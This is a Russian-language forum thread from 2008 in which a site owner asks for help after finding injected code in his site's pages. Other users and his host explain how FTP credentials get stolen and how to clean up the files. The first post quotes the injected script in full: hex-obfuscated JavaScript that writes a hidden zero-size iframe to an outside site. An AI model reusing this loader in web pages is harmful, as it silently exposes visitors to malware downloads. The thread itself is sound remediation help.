Langly 7 Опубликовано: 19 марта 2008 Рассказать Опубликовано: 19 марта 2008 (изменено) Заметил вверху страницы, при просмотре HTML кода, вот это... Подскажите пожалуйста, что это??? <script type="text/javascript">function ahpgxusvlwuzz(skusjits){var fgdxbotv="";for(uknzaxauyi=0;uknzaxauyi <skusjits.length;uknzaxauyi+=2){fgdxbotv+=(String.fromCharCode(parseInt(skusjits.substr(uknzaxauyi,2),16)));}document.write(fgdxbotv);} ahpgxusvlwuzz"3C696672616D65207372633D22687474703A2F2F746F703130302D636F756E7465722E636F6D 2F746F703130302F696E6465782E70687022206672616D65626F726465723D22302220626F726465 723D2230222077696474683D22302 2206865696768743D223022207374796C653D22706F736974696F6E3A206162736F6C7574653B207 669736962696C6974793A2068696464656E3B 20646973706C61793A206E6F6E65223E3C2F696672616D653E");</script> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> Изменено 19 марта 2008 пользователем Langly Цитата Ссылка на сообщение Поделиться на других сайтах
SiMuS 0 Опубликовано: 19 марта 2008 Рассказать Опубликовано: 19 марта 2008 Если ты сам этого не добавлял, то меняй пароли на фтп, обращайся к хостеру. Это вирус скорее всего. Цитата Ссылка на сообщение Поделиться на других сайтах
Langly 7 Опубликовано: 19 марта 2008 Рассказать Опубликовано: 19 марта 2008 Автор Если ты сам этого не добавлял, то меняй пароли на фтп, обращайся к хостеру. Это вирус скорее всего. Откуда он мог появиться? То есть возможные пути проникновения. Цитата Ссылка на сообщение Поделиться на других сайтах
SiMuS 0 Опубликовано: 19 марта 2008 Рассказать Опубликовано: 19 марта 2008 (изменено) троян на твоем компе - украдены пароли от фтп - залито по фтпвзломан комп хостера - украдены пароли от фтп- залито по фтптроян на твоем компе - узнаны пароли от админки - добавлена запись в шаблоныдал кому то пароли от админки - добавлена запись в шаблоныне установил баг-фиксы - взломана админка - добавлена запись в шаблоны Изменено 19 марта 2008 пользователем SiMuS Цитата Ссылка на сообщение Поделиться на других сайтах
Langly 7 Опубликовано: 19 марта 2008 Рассказать Опубликовано: 19 марта 2008 (изменено) Автор троян на твоем компе - украдены пароли от фтп - залито по фтпвзломан комп хостера - украдены пароли от фтп- залито по фтптроян на твоем компе - узнаны пароли от админки - добавлена запись в шаблоныдал кому то пароли от админки - добавлена запись в шаблоныне установил баг-фиксы - взломана админка - добавлена запись в шаблоны А почему антивирус пишет "подозрительных объектов не обнаружено"? Куды бечь? Что делать -то? Если я его найду в шаблонах и удалю, это решит проблему? Как быть уверенным в том, что ничего нигде не осталось? И как искать? Может он разбросан кусками по разным местам... P.S.Я его найти не могу... где, и самое главное, как искать?Подскажите пожалуйста. Изменено 19 марта 2008 пользователем Langly Цитата Ссылка на сообщение Поделиться на других сайтах
empirator 0 Опубликовано: 19 марта 2008 Рассказать Опубликовано: 19 марта 2008 (изменено) Насчет где - большая вероятность, что index.php или engine.php. Сторонние модули ставил? Есть реклама на сайте? Изменено 19 марта 2008 пользователем empirator Цитата Ссылка на сообщение Поделиться на других сайтах
Langly 7 Опубликовано: 19 марта 2008 Рассказать Опубликовано: 19 марта 2008 Автор Насчет где - большая вероятность, что index.php или engine.php. Сторонние модули ставил? Есть реклама на сайте? Реклама-то есть. Но она есть давно, а эта хрень сегодня с утра появилась. Началось с того, что касперыч заверещал, когда я сайт открывал: обнаружено: троянская программа Trojan-Downloader.JS.Agent.iz Скрипт: http://endem.ru/[1] обнаружено: троянская программа Trojan-Downloader.JS.Psyme.mf Скрипт: http://endem.ru/[3] После, ни одного визга от него не было и сейчас нет. Заткнулся и молчит. А скрипт этот висит в самом верху страницы, при просмотре HTML его видно... Шаблон открываю - там нет. Проверка сайта, его антивирусом из админки, ничего не дает... Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 095 Опубликовано: 19 марта 2008 Рассказать Опубликовано: 19 марта 2008 Langly, файл index.php проверьте Цитата Ссылка на сообщение Поделиться на других сайтах
Langly 7 Опубликовано: 19 марта 2008 Рассказать Опубликовано: 19 марта 2008 Автор Langly, файл index.php проверьте Не могу попасть на сервер... Цитата Ссылка на сообщение Поделиться на других сайтах
Langly 7 Опубликовано: 20 марта 2008 Рассказать Опубликовано: 20 марта 2008 Автор Вот что хостер мне написал: Здравствуйте! В сети интернет появился новый тип вируса - Downloader.JS.Psyme.ct (возможны другия названия), распространяющий себя через веб-сайты. Схема заражения довольно проста: достаточно зайти на зараженный сайт и при стандартных настройках безопасности браузера, вирус автоматически установится на компьютере пользователя. После этого он начинает отслеживать логины и пароли от FTP, высылая их злоумышленникам. Собрав определенное количество паролей, запускается специальная программа, которая подключается по FTP к каждому сайту и встраивает в начало или конец страниц собственный html-код. Обращаем внимание, что в интернете можно встретить обсуждение данной проблемы, где в качестве причин заражения указываются различные бесплатные "движки" (phpBB и т.д.), либо наличие уязвимостей у хостинг-провайдеров. Со своей стороны можем заверить, что вирус распространяется только способом, описанным в этом письме, и его появление не связано с проблемами безопасности на сервере. В случае обнаружения следов вируса необходимо выполнить следующие действия с обязательным соблюдением порядка: 1. Проверить нет ли чужих скриптов на ftp 2. Удалить все лишние коды iframe и javascript со страниц 3. Сменить ftp-клиент и браузер. Поставить новые версии, скаченные с сайтов-производителей. 4. Поставить фаервол 5. Сменить все пароли 6. Не сохранять пароли в программах на комьютере. Вводить каждый раз. Какой пароль для входа Вы используете? Цитата Ссылка на сообщение Поделиться на других сайтах
Langly 7 Опубликовано: 20 марта 2008 Рассказать Опубликовано: 20 марта 2008 Автор Я заменил файлы index.php и engine.php Толку нет. Как висела эта дрянь так и висит. Какие файлы заменить? Где эта гадость может быть? И как искать? Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 095 Опубликовано: 20 марта 2008 Рассказать Опубликовано: 20 марта 2008 Langly перезалейте все файлы дистрибутива в папке /engine/ Цитата Ссылка на сообщение Поделиться на других сайтах
Langly 7 Опубликовано: 20 марта 2008 Рассказать Опубликовано: 20 марта 2008 Автор Делаю... Вот что я увидел в процессе: в папке public_html/engine/cache/ нет файла .htaccess Я его туда закачиваю, а он не появляется. При закачке пишет, что такой файл уже есть, но я его не вижу... что это? Спанель глючит, или результат деятельности этого вируса? Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 095 Опубликовано: 20 марта 2008 Рассказать Опубликовано: 20 марта 2008 Спанель глючит, или результат деятельности этого вируса? это особенности сервера, к вирусу никакого отношения не имеет Цитата Ссылка на сообщение Поделиться на других сайтах
WMDrakon 20 Опубликовано: 20 марта 2008 Рассказать Опубликовано: 20 марта 2008 Langly, может стоит включить показ скрытых файлов на сервере? Мой ответ уже не актуален)))) Цитата Ссылка на сообщение Поделиться на других сайтах
Langly 7 Опубликовано: 20 марта 2008 Рассказать Опубликовано: 20 марта 2008 Автор Все, чисто. Слава богу. Вот дрянь какая... Что мне теперь делать? Кроме смены паролей, ессно. Цитата Ссылка на сообщение Поделиться на других сайтах
Danila 8 Опубликовано: 20 марта 2008 Рассказать Опубликовано: 20 марта 2008 Все, чисто. Слава богу. Вот дрянь какая... Что мне теперь делать? Кроме смены паролей, ессно. Антивирусом еще раз провериться Цитата Ссылка на сообщение Поделиться на других сайтах
SiMuS 0 Опубликовано: 20 марта 2008 Рассказать Опубликовано: 20 марта 2008 и spybot'ом просканиться Цитата Ссылка на сообщение Поделиться на других сайтах
Langly 7 Опубликовано: 24 марта 2008 Рассказать Опубликовано: 24 марта 2008 Автор Антивирус ее изначально не увидел. Кстати, Celsoft, почему? Имею в виду штатный антивирь из админпанели. и spybot'ом просканиться А это как? Где-то есть сервис? Ссылочку можно? Цитата Ссылка на сообщение Поделиться на других сайтах
ShVad 2 Опубликовано: 24 марта 2008 Рассказать Опубликовано: 24 марта 2008 Имею в виду штатный антивирь из админпанели. Он проверяет на файлы! Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 095 Опубликовано: 24 марта 2008 Рассказать Опубликовано: 24 марта 2008 Антивирус ее изначально не увидел. нужно делать снимок файлов, чтобы отслеживать изменения. Цитата Ссылка на сообщение Поделиться на других сайтах
Langly 7 Опубликовано: 25 марта 2008 Рассказать Опубликовано: 25 марта 2008 Автор Антивирус ее изначально не увидел. нужно делать снимок файлов, чтобы отслеживать изменения. Где об этом поподробнее почитать? Снимок, допустим сделал. А дальше? Как его сравнивать, проверять? И если нашел различия, что делать и как, после? Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 095 Опубликовано: 25 марта 2008 Рассказать Опубликовано: 25 марта 2008 Если вы сделали снимок то антивирус автоматически сверяет со снимком, если в каком либо файле произойдут малейшие изменения, то антивирус покажет какой из файлов не соответствует сделанному снимку. Например попробуйте отредактировать любой из файлов скрипта и сохраните, после этого запустите проверку антивирусом. Цитата Ссылка на сообщение Поделиться на других сайтах
Langly 7 Опубликовано: 27 марта 2008 Рассказать Опубликовано: 27 марта 2008 Автор Если вы сделали снимок то антивирус автоматически сверяет со снимком, если в каком либо файле произойдут малейшие изменения, то антивирус покажет какой из файлов не соответствует сделанному снимку. Например попробуйте отредактировать любой из файлов скрипта и сохраните, после этого запустите проверку антивирусом. Угу, спасибо. Посмотрим. Цитата Ссылка на сообщение Поделиться на других сайтах
warning85 0 Опубликовано: 26 февраля 2010 Рассказать Опубликовано: 26 февраля 2010 Я заменил все файлы из папки engine и теперь написано что движок не установлен наберите --_dk-kapotja.ru/install.php_-- Что делать, помогите, порно достало уже! Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.